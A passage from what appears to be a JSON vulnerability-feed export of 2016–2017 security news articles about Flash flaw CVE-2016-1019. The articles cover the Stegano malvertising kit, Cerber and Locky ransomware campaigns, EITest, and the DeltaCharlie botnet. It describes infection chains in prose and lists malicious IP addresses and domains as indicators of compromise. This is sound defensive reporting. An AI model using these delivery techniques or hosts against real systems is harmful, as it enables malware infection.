_Kafeine_, FireEye's_ Genwei Jiang_, and Google's _Clement Lecigne,_ the flaw affects Adobe Flash Player 21.0.0.197 and its earlier versions for Windows, Macintosh, Linux and Chrome OS.\n\n \n\n\nThe vulnerability, assigned under CVE-2016-1019, also expands back to Windows 7 and even towards Windows XP.\n\n \n\n\nAdobe had also [confirmed](<https://helpx.adobe.com/security/products/flash-player/apsa16-01.html>) that the newly discovered vulnerability in its Flash Player is being exploited actively in the wild.\n\n \n\n\n### Update Adobe Flash Player Software\n\n \n\n\nThis issue caused the Adobe engineers to urgently work on a mitigation method and release an emergency update under [Flash Player 21.0.0.182](<https://get.adobe.com/flashplayer/>), which is expected to get released this Thursday.\n\n \n\n\nUsually, Adobe releases its patch on the second Tuesday of the month, the same day as Microsoft, but rolls out emergency patches on an ad hoc basis, analyzing the seriousness of the bug.\n\n \n\n\nThe endless Adobe updates and upgrades had failed to ensure the user security in the real time scenario. So it's high time for users to disable or completely uninstall Adobe Flash Player.\n\n \n\n\nBelieve or not, Adobe Flash Player is dead and its time has passed.\n\n \n\n\nIn January last year, YouTube moved away from Flash for delivering videos.\n\n \n\n\nAlthough in between Flash made an effort to beef up its security in a bid to justify its existence, things got a bit heated when Firefox became aware of a critical bug and [blocked the Flash plugin](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) entirely.\n\n \n\n\nFacebook\u2019s Security Chief publicly called for Adobe to announce a kill date for Flash. In fact, Google Chrome has also begun blocking auto-playing Flash ads by default.\n", "cvss3": {}, "published": "2016-04-05T23:26:00", "type": "thn", "title": "Adobe to issue Emergency Patch for Critical Flash Player Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-06T10:26:20", "id": "THN:C86B358352EEF0DC351F2DD0FA088E77", "href": "https://thehackernews.com/2016/04/adobe-flash-update.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-LcT8O23njws/WEe8BvRhm_I/AAAAAAAAqeA/D8GOfD7oCSMDAcImuqa7_-oueUq-qym5wCLcB/s1600/stegano-exploit-kit-malware-hacking.png>)\n\nIf you have visited any popular mainstream website over the past two months, your computer may have been infected \u2014 Thanks to a new exploit kit discovered by security researchers. \n \nResearchers from antivirus provider ESET released a [report](<http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/>) on Tuesday stating that they have discovered an exploit kit, dubbed **Stegano**, hiding malicious code in the pixels of banner advertisements that are currently in rotation on several high profile news websites. \n \nStegano originally dates back to 2014, but since early October this year, cyber crooks had managed to get the malicious ads displayed on a variety of unnamed reputable news websites, each with Millions of daily visitors. \n \nStegano derived from the word **[Steganography](<https://thehackernews.com/2015/06/Stegosploit-malware.html>)**, which is a technique of hiding messages and content inside a digital graphic image, making the content impossible to spot with the naked eye. \n \nIn this particular malvertising campaign, operators hide malicious code inside transparent PNG image's Alpha Channel, which defines the transparency of each pixel, by altering the transparency value of several pixels. \n \nThe malvertising campaign operators then packed the altered image as an advertisement and managed to display those malicious ads on several high-profile websites. \n \nAccording to the researchers, the malicious ads promote applications called \"Browser Defense\" and \"Broxu,\" and the methodology makes it tough for ad networks to detect. \n \n\n\n### Here's How the Stegano Attack Works:\n\n \nOnce a user visits a site hosting malicious advertisement, the malicious script embedded in the ad reports information about the victim's computer to the attacker's remote server without any user interaction. \n \nThe malicious code then uses the CVE-2016-0162 vulnerability in Microsoft's Internet Explorer (IE) browser in order to scan the target computer to see if it is running on a malware analyst's machine. \n \nAfter verifying the targeted browser, the malicious script redirects the browser to a website that hosts Flash Player exploits for three now-patched Adobe Flash vulnerabilities: CVE-2015-8651, CVE-2016-1019, and CVE-2016-4117. \n\n\n> \"Upon successful exploitation, the executed shell code collects information on installed security products and performs \u2013 as paranoid as the cybercriminals behind this attack \u2013 yet another check to verify that it is not being monitored,\" ESET researchers wrote in a blog post. \"If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.\"\n\nWhen downloaded to the victim's computer, the encrypted payload is then decrypted and launched via regsvr32.exe or rundll32.exe in Microsoft Windows. \n \n\n\n### Just Visit a Site, and You'll be Hacked in Just 2-3 Sec\n\n \nBelow is an ESET infographic that explains the working of Stegano's exploit attack: \n\n\n[](<https://2.bp.blogspot.com/-X5Wqj0LvCm4/WEfDwXzrj9I/AAAAAAAAqeQ/zo2BY0Bq_yE9IiBqIa-fkNdLmnHPtX9WgCLcB/s1600/exploit-kit-working.png>)\n\n \nAll the above operations execute automatically without any user interactions and takes place in the span of just 2-3 seconds. \n \nSo far, the Stegano exploit kit has pushed various trojan downloaders, the Ursnif and Ramnit banking trojans, backdoors, spyware, and file stealers. \n \nThe Stegano exploit kit was initially used in 2014 to target people in the Netherlands, and then in 2015, moved on to residents in the Czech Republic. The latest attack campaign is targeting people in Canada, the UK, Australia, Spain, and Italy. \n \nThe best way to protect yourself against any malvertising campaign is always to make sure you are running updated software and apps. Also use reputed antivirus software that can detect such threats before they infect your system.\n", "cvss3": {}, "published": "2016-12-06T21:08:00", "type": "thn", "title": "Hacking Millions with Just an Image \u2014 Recipe: Pixels, Ads & Exploit Kit ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0162", "CVE-2016-1019", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-12-07T08:09:54", "id": "THN:BF8375E3582DA11921BF468B0D3C4F03", "href": "https://thehackernews.com/2016/12/image-exploit-hacking.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:00", "description": "[](<https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png>)\n\nThe United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation. \n \nThe [joint report](<https://www.us-cert.gov/ncas/alerts/TA17-164A>) from the FBI and U.S. Department of Homeland Security (DHS) provided details on \"**DeltaCharlie**,\" a malware variant used by \"**Hidden Cobra**\" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network. \n \nAccording to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure. \n \nWhile the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace \u2013 the one allegedly [linked to the devastating WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>) menace that shut down hospitals and businesses worldwide. \n \n\n\n### DeltaCharlie \u2013 DDoS Botnet Malware\n\n \nThe agencies identified [IP addresses](<https://www.us-cert.gov/sites/default/files/publications/TA-17-164A_csv.csv>) with \"high confidence\" associated with \"DeltaCharlie\" \u2013 a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. \n \nDeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including [Domain Name System](<https://thehackernews.com/2014/06/dns-flood-ddos-attack-hit-video-gaming.html>) (DNS) attacks, [Network Time Protocol](<https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html>) (NTP) attacks, and Character Generation Protocol (CGP) attacks. \n \nThe botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks. \n \nHowever, the DeltaCharlie DDoS malware is not new. \n \nDeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [[PDF](<https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf>)], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo. \n \nOther malware used by Hidden Cobra include [Destover](<https://securelist.com/destover/67985/>), Wild Positron or [Duuzer](<https://www.symantec.com/connect/blogs/duuzer-back-door-trojan-targets-south-korea-take-over-computers>), and [Hangman](<http://telussecuritylabs.com/threats/show/TSL20150910-04>) with sophisticated capabilities, including [DDoS botnets](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>), keyloggers, remote access tools (RATs), and [wiper malware](<https://thehackernews.com/2013/03/south-korea-cyber-attack-wiper-malware.html>). \n \n\n\n### Hidden Cobra's Favorite Vulnerabilities\n\n \nOperating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into victim's machine. \n \nThese are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra: \n\n\n * Hangul Word Processor bug (CVE-2015-6585)\n * Microsoft Silverlight flaw ([CVE-2015-8651](<https://thehackernews.com/2015/12/adobe-flash-security-update.html>))\n * Adobe Flash Player 18.0.0.324 and 19.x vulnerability (CVE-2016-0034)\n * Adobe Flash Player 21.0.0.197 Vulnerability ([CVE-2016-1019](<https://thehackernews.com/2016/04/adobe-flash-update.html>))\n * Adobe Flash Player 21.0.0.226 Vulnerability ([CVE-2016-4117](<https://thehackernews.com/2016/12/image-exploit-hacking.html>))\nThe simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall. \n \nSince Adobe Flash Player is prone to many attacks and just today the company [patched nine vulnerability in Player](<https://thehackernews.com/2017/06/security-patch-tuesday.html>), you are advised to update or remove it completely from your computer. \n \nThe FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group. \n\n\n> \"If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,\" the alert reads.\n\nBesides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow [here](<https://www.us-cert.gov/ncas/alerts/TA17-164A>).\n", "cvss3": {}, "published": "2017-06-14T01:23:00", "type": "thn", "title": "US Warns of 'DeltaCharlie' \u2013 A North Korean DDoS Botnet Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-6585", "CVE-2016-1019", "CVE-2016-0034", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-06-14T12:23:04", "id": "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "href": "https://thehackernews.com/2017/06/north-korea-hacking-malware.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:19", "description": "Starting in April security experts at FireEye spotted a massive uptick in Cerber ransomware attacks delivered via a rolling wave of spam. Researchers there link the Cerber outbreaks to the fact that attackers are now leveraging the same spam infrastructure credited for making the potent Dridex financial Trojan extremely dangerous.\n\nCerber, which is best known for its high-creep factor in using text-to-speech to \u201cspeak\u201d its ransom note to victims, was first spotted in the wild in February. Its [typical distribution method was via exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>), with Magnitude and Nuclear Pack exploiting a zero day in Adobe Flash Player (CVE-2016-1019). But as recently as May 4, FireEye reports, Cerber is now part of a spam campaign linked to Dridex botnets.\n\n\u201cBy partnering with the same spam distributor that has proven its capability by delivering Dridex on a large scale, Cerber is likely to become another serious email threat similar to Dridex and Locky,\u201d wrote FireEye security analysts in [a research blog](<https://www.fireeye.com/blog/threat-research/2016/05/cerber_ransomware_partners_with_Dridex.html>) posted Thursday.\n\nDridex is a financial Trojan that has emerged as a significant threat to consumers and business, targeting the acquisition of financially related credentials. Its chief means of distribution is Dridex botnets that have been behind massive spam campaigns since February and are responsible for pushing out millions of targeted spam messages a day.\n\nCerber ransomware, according to FireEye, follows the same spam framework as Dridex. Targets are sent emails with an attachment disguised as an invoice that contains malicious VBScript. Once the user opens the document, they\u2019re encouraged to enable macros.\n\nIn the case of Cerber, the malicious attachment obfuscates the offending VBScript that may be detected by an email gateway or spam filter. Instead, the macro downloads and installs the VBScript in the %appdata% path of the targeted PC. The VBScript is further manipulated to avoid detection and reverse engineering through the injection of junk code.\n\nNext, Cerber sniffs out whether a victim has an internet connection. If it does, the last piece of the Cerber ransomware is delivered. That\u2019s when the VBScript sends an HTTP Range Request to fetch a JPEG file from a URL. \u201cIn the HTTP Request Headers, it sets the value of Range Header to: \u201cbytes=11193-\u201c. This indicates to the web server to return only the content starting at offset 11,193 of the JPG file,\u201d FireEye wrote.\n\nThis multi-stage technique of delivering the Cerber payload, FireEye said, is similar to HTTP Range Request checks leveraged by Dridex and Ursnif Trojans.\n\nOther similarities that Cerber has to Dridex include the fact that spam campaigns are typically English language only and are financially motivated booby-trapped with invoice, receipt, and order attachments.\n\nOnce Cerber goes to work on a system, it targets email, Word documents, and Steam (gaming) related files appending encrypted files with the \u2018.cerber\u2019 file extension. Victims are directed to visit various versions of the \u201cdecrypttozxybarc\u201d domain. In some instances, FireEye said, Cerber also installs a spambot module on the host PC. Attackers, FireEye suspect, are in the test stages of using infected PCs for distributing spam.\n", "cvss3": {}, "published": "2016-05-13T13:24:49", "type": "threatpost", "title": "Cerber Ransomware On The Rise, Fueled By Dridex Botnet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-05-13T17:24:49", "id": "THREATPOST:119E7D78B854D1FD10222FB18949985B", "href": "https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "description": "A two-year-old EITest malware campaign is still going strong, fueled by the fact it has shifted its distribution technique over time. Now, researchers at the SANS Institute\u2019s Internet Storm Center, are reporting EITest is morphing again based on analysis of the malware campaign conducted earlier this month.\n\nAccording to researcher Brad Duncan, the EITest malware campaign is being refueled by the fact it is shifting from the Angler exploit kit to the Neutrino exploit kit.\n\n\u201cDuring its run, I had only noticed the EITest campaign use Angler EK to distribute a variety of malware payloads. That changed earlier this month, when I noticed an EITest gate leading to Neutrino EK instead of Angler,\u201d Duncan [wrote in an Internet Storm Center post](<https://isc.sans.edu/diary/EITest+campaign+still+going+strong/21081>).\n\nFirst identified in July of 2014 by Malwarebytes, EITest is known for leveraging thousands of legitimate websites that have been hacked and used in tandem with a Flash-based redirection script to deliver payloads such as the Gootkit Trojan information stealer.\n\nIn the case of EITest, attackers were booby trapping legitimate sites with drive-by downloads unbeknownst to their owners by using rotating URLs as the exploit kit\u2019s landing page. The perpetrators did this by inserting a Flash application code at the bottom of an infected site\u2019s main page to direct traffic to a malicious landing page. To avoid URL blacklisting, attackers used free DNS services to register disposable subdomains to create a large pool of URLs that can be used once and then trashed.\n\nDuncan now says the EITest campaigns is now using 85.93.0.0/24 for a gate between the compromised website and the Neutrino EK. \u201cThe TLD for these gate domains has most often been .tk but we\u2019ve seen .co.uk domains used this week,\u201d he wrote.\n\nAs for the payload, in two instances Duncan reports he was running Adobe Flash Player 20.0.0.306, which is vulnerable to [CVE-2016-1019](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1019>), which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code.\n\nPalo Alto Networks has also been tracking the progress of the stubborn EITest malware campaign. In March, researchers noticed that the EITest gate occasionally changes IP addresses, but consistently used the TLDs .tk, .uk and .com.\n\n\u201cThe EITest gate URL continues to return a Flash file that redirects traffic to Angler EK. This gate URL always generates two HTTP GET requests. The first request retrieves the Flash file and the second request returns script pointing to an Angler EK landing page,\u201d [wrote Palo Alto in March](<http://researchcenter.paloaltonetworks.com/2016/03/unit42-how-the-eltest-campaigns-path-to-angler-ek-evolved-over-time/>).\n\nNow SANS Institute\u2019s Internet Storm Center says the indicators of compromise on its test systems include the EITest gate 85.93.0.33 port 80 (true.imwright.co.uk) and 104.238.185.187 port 80 (ndczaqefc.anein.top) for the Neutrino EK with the payload Gootkit information stealer.\n\nDuncan observed a second infection chain from the EITest campaign used the Angler ET with the following the indicators of compromise; 85.93.0.33 port 80 \u2013 _true.imwright.co.uk_ \u2013 EITest gate, 185.117.75.219 port 80 \u2013 _kmgb0.yle6to.top_ \u2013 Angler EK, and delivering an undetermined payload.\n", "cvss3": {}, "published": "2016-05-23T13:08:28", "type": "threatpost", "title": "Persistent EITest Malware Campaign Jumps from Angler to Neutrino", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-05-23T17:08:28", "id": "THREATPOST:6844AEC17FA3A44CD47E847B8DC4AC54", "href": "https://threatpost.com/persistent-eitest-malware-campaign-jumps-from-angler-to-neutrino/118249/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:31", "description": "Exploits for a zero-day vulnerability in Adobe Flash Player are being aggressively distributed in two exploit kits. The zero day, meanwhile, was patched by Adobe in an [emergency update](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) released Thursday night.\n\nAttackers are using the previously unpatched flaw in the maligned Flash Player to infect victims with either Locky or Cerber ransomware. [Locky](<https://threatpost.com/locky-variant-changes-c2-communication-found-in-nuclear-ek/117196/>) is a relatively new crypto-ransomware strain, spread primarily via spam with attachments enticing users to enable macros in Word documents that download the malware onto machines. [Cerber](<http://www.bleepingcomputer.com/news/security/the-cerber-ransomware-not-only-encrypts-your-data-but-also-speaks-to-you/>) is also crypto-ransomware that includes a feature where the infected machine will speak to the victim.\n\nThis turn in using the exploit kits to move ransomware isn\u2019t new, but does escalate the distribution of Locky in particular, which is believed to be at the heart of a number of [high-profile compromises](<https://threatpost.com/locky-ransomware-causes-internal-state-of-emergency-at-kentucky-hospital/116949/>) in the health care industry.\n\nResearchers at Proofpoint said the zero day has been folded into both the Nuclear and Magnitude exploit kits, with Nuclear infections pushing Locky and Magnitude spreading Cerber.\n\nThe zero day vulnerability affects all versions of Flash Player on Windows 10 and earlier, said Kevin Epstein, vice president of Proofpoint\u2019s threat operations center. Today\u2019s update patched two dozen vulnerabilities, including the zero day; most the flaws were memory corruption bugs, as well as use-after-free, type-confusion and stack overflaws, in addition to a security bypass vulnerability.\n\nWhile the attackers have hundreds of millions of potential targets at their disposal with the zero day, they have limited this particular exploit to older versions of Flash Player, Epstein said.\n\n\u201cThe interesting thing about this distribution of the exploit is that the attackers don\u2019t appear to have taken full advantage of the exploit,\u201d he said. \u201cIt\u2019s not clear if they fully understood what they had. It is a zero day, but within this exploit kit, it\u2019s only targeting earlier versions of Flash. They\u2019ve self-limited their target audience, and it\u2019s not clear why.\u201d\n\nNonetheless, the exploit has been aggressively distributed, and for some time. While the Magnitude distribution of Cerber ransomware was found only in the last 72 hours, Epstein said Nuclear has been pushing Locky using this exploit since March 31.\n\nThe scale of these attacks has the potential to be massive, Proofpoint said. While both Nuclear and Magnitude are not as prevalent on the scale of the Angler EK, they are effective and popular choices on the black market. Combine that with previous distributions of Locky in a number of spam campaigns, some of them reaching multimillions of email messages a day, according to Proofpoint, and there is the potential for longstanding trouble.\n\nAdobe said in an [advanced notification](<https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/>) two days ago that an exploit could crash a system and allow attackers to execute arbitrary code on a compromised machine. Adobe added that a mitigation introduced on March 10 in Flash 21.0.0.182 protects users against attack; users are urged to update immediately. Adobe said active attacks using CVE-2016-1019 are targeting Windows 7 and Windows XP systems running Flash 20.0.0.306 and earlier.\n\n\u201cThe nature of vulnerability allows the attackers to execute arbitrary code on your machine; in this case, the Flash exploit is assisting the attacker to write arbitrary instructions to a point in memory,\u201d Epstein said. \u201cThat set of instructions in this case downloads the ransomware and executes it.\u201d\n\nEpstein said that the exploit is checking only for older versions of Flash Player, even though all versions prior to today\u2019s update are vulnerable.\n\nThe escalation of ransomware is alarming with new capabilities being regularly added to new strains. Ransomware such as Locky, for example, will encrypt all files stored on a machine and will seek out other machines on network shares, or even online backups the target machine may have access to. Vicitms are prompted to pay via Bitcoin relatively inexpensive ransoms in order to retrieve their locked files.\n\n\u201cRansomware, we suspect because of the macro economic ROI is something that\u2019s going to be a growing problem,\u201d Epstein said. \u201cIt\u2019s here to stay a while.\u201d\n", "cvss3": {}, "published": "2016-04-07T21:08:20", "type": "threatpost", "title": "Latest Flash Zero Day Being Used to Push Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-11T12:07:04", "id": "THREATPOST:B072B076007EAC04FA7859A728FEF476", "href": "https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "Criminals behind the latest Cerber ransomware variant are leveraging Google redirects and Tor2Web proxies in a new and novel way to evade detection.\n\nResearchers with Cisco Talos spotted the shifting tactic last week when it began tracking the latest Cerber (5.0.1) ransomware variant. The technique defies Cerber\u2019s typical attack strategy of spam campaigns, malicious attachments and well written, professional looking emails, according to Talos researchers.\n\n\u201cThis campaign looked different in that the messages didn\u2019t contain an attachment and were extremely short and basic,\u201d wrote Cisco Talos [researchers in a report posted Monday](<http://blog.talosintel.com/2016/11/cerber-spam-tor.html>). According Talos, the Cerber spam campaign resembled something more closely associated with Locky ransomware, which relies heavily on script-based file extensions used to download the Locky executable.\n\nTalos describes this latest Cerber campaign as a \u201cpotential next evolution for ransomware distribution\u201d that relies heavily on the Tor network and Dark Web to obfuscate the attacker\u2019s activity and thwart mitigation efforts.\n\nAccording to Talos, the Cerber 5.0.1 variant forgoes the use of malicious attachments in exchange for emails that contain hyperlinks. Targets are enticed to click hyperlinks that are disguised as various files of potential interest to recipients such as pictures, order details, transaction logs and loan acceptance letters.\n\n\u201cWhen a victim clicks on a hyperlink they are taken to a Google redirect that points (the browser) to a malicious Word document hosted on the Dark Web. But because you need a Tor browser to access the Dark Web, attackers use the Google redirect service to connect targets to a Tor2Web proxy service first,\u201d said Nick Biasini, researcher with the Cisco Talos team.\n\nUse of the Tor2Web proxy service allows adversaries to host files on the Dark Web, making it extremely difficult to know where files are hosted and shut down the offending server, Biasini said. \u201cUsing proxy services like Tor2Web enables access to the Tor network without requiring a Tor client to be installed locally on the victim\u2019s system,\u201d researchers point out.\n\n\u201cWe have seen Tor used in ransomware quite a bit. But it has been used primarily for command-and-control communications and retrieving ransom notes for the victims to get Bitcoin wallets. What makes this most recent Cerber (5.0.1) variant so interesting to researchers is the fact the hosting of all the malicious activity is on Tor,\u201d Biasini said.\n\nThat\u2019s not so say earlier incarnations and techniques associated with Cerber ransomware have been abandoned. Still the bulk of Cerber, Biasini said, is distributed using traditional techniques such as the RIG exploit kit and malicious attachments sent via spam campaigns. \u201cThe reason this campaign is important is because it signals an evolution for Cerber adversaries,\u201d Biasini said.\n\nCerber, which is best known for its high-creep factor in using text-to-speech to \u201cspeak\u201d its ransom note to victims, was first spotted in the wild in February. Its [typical distribution method was via exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>), with Magnitude and Nuclear Pack exploiting a zero day in Adobe Flash Player (CVE-2016-1019). In May, [researchers at FireEye reported](<https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/>), Cerber was part spam campaigns linked to Dridex botnets. In August, researchers reported a new Cerber variant, [dubbed Cerber 2](<https://threatpost.com/2-5-million-a-year-ransomware-as-a-service-ring-uncovered/119902/>), they said was part of a ransomware-as-a-service ring.\n\n\u201cCerber has continued to shift its tactics and evolve rapidly over just the past several months,\u201d Biasini said.\n\nIn this most recent campaign, once the initial redirection and Tor2Web proxying occurs, the victim\u2019s system will download a malicious Word document. If a potential victim chooses to open the file attachment they are prompted via a Word document to \u201cenable content\u201d or the macro.\n\n\u201cIf the victim opens the malicious MS Word document and enables macros, the downloader will use the Windows Command Processor to invoke Powershell which will then download (using Tor2Web) and execute the actual Cerber PE32 executable,\u201d Talos describes.\n\nThis version of Cerber demands 1.4 bitcoins ($1,000). If the ransom demand is not met within five days the ransom payment amount doubles.\n\n\u201cThis latest distribution campaign highlights how ransomware based threats are continuing to evolve and mature over time, and shows an increasingly sophisticated infection process as attackers continue to implement new methods to attempt to evade detection and make analysis more difficult,\u201d Talos researchers wrote.\n\nTalos recommends that all Tor2Web and Tor traffic be blocked in organization as the most effective way to mitigate risk to this latest Cerber threat. \u201cOrganizations need to decide if the business case for allowing Tor and Tor2Web on the network outweighs the potential risks to its users,\u201d Cisco Talos wrote.\n", "cvss3": {}, "published": "2016-11-30T07:00:33", "type": "threatpost", "title": "New Cerber Variant Leverages Tor2Web Proxies, Google Redirects", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-11-30T07:31:11", "id": "THREATPOST:FA8E33E96268AABB7760B30AFBCF0924", "href": "https://threatpost.com/new-cerber-variant-leverages-tor2web-proxies-google-redirects/122169/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:31", "description": "Adobe will release an emergency Flash Player update as soon as Thursday, patching a critical vulnerability that is being publicly attacked.\n\nAdobe said the vulnerability is in version 21.0.0.197 and earlier for Windows, Mac OS X, Linux and Chrome OS.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa16-01.html>) published late this afternoon.\n\nAdobe said that a mitigation introduced on March 10 in Flash 21.0.0.182 protects users against attack; users are urged to update immediately. Adobe said active attacks using CVE-2016-1019 are targeting Windows 7 and Windows XP systems running Flash 20.0.0.306 and earlier.\n\nFrench researcher Kafeine, who publishes updates on his personal site on exploit kits, is one of three researchers credited with disclosing the bug to Adobe along with FireEye\u2019s Genwei Jiang and Google\u2019s Clement Lecigne.\n\nKafeine told Threatpost he would not comment before the availability of a patch.\n\nThe March 10 [Flash Player update](<https://threatpost.com/flash-player-update-patches-18-remote-code-execution-flaws/116707/>) was part of Adobe\u2019s regular monthly security update cycle. It patched 18 remote code execution flaws, including one, CVE-2016-1010, being exploited in the wild.\n", "cvss3": {}, "published": "2016-04-05T19:09:09", "type": "threatpost", "title": "Emergency Adobe Flash Player Security Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1010", "CVE-2016-1019"], "modified": "2016-04-07T21:57:25", "id": "THREATPOST:02FB00D8BE50B1B6165E20F03EBF20C0", "href": "https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. \u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May, Kafeine said, identifying a number of vulnerabilities exploit by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 